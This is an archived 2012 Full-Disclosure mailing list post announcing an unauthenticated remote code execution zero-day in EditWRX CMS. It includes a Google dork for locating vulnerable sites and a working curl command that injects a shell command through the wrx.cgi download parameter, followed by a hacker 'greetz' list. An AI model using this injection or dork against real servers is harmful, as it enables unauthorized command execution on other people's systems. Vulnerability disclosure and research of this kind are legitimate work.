| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <E1Rwbuu-0007rs-NI@max5.hosteur.com>
Date: Sun, 12 Feb 2012 17:04:44 +0100
From: chippy@...ania.gov.ro
To: full-disclosure@...ts.grok.org.uk
Subject: EditWRX CMS Remote Code Execution + Admin Bypass
Zero Day
__ __ ____ ______ ______ ______
.----.| |--.|__|.-----.-----.--.--.|_ | |__ |__ | |
| __|| || || _ | _ | | | _| |_|__ |__ |_ |
|____||__|__||__|| __| __|___ ||______|______|______| |____|
_________________|__|__|__|__|_____|_____________________________
VULN_____________________________________________________________
EditWRX CMS Remote Code Execution + Admin Bypass Zero Day
NFO______________________________________________________________
EditWRX is vulnerable to remote code execution through mishandling
of open() in the downloader, which can read in piped commands.
Despite the downloader being an administrative component, a login
is not required to call the function, and therefore no access is
required to exploit this vulnerability.
ZDAY_____________________________________________________________
Google: inurl:editwrx/wrx.cgi
RXE: curl http://example.com/editwrx/wrx.cgi?download=;uname%20-a|
Found by: chippy1337
GREETZ___________________________________________________________
Robert Cavanaugh
Ryan Cleary
Jasper Lingers
Carlos1337 (dos cero dia!)
MASTER HACKER
FLOOD HACKER
DR TIGER
WANG HACKER
DDOS KING
Sabu, Havij Professional
D0xbin
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists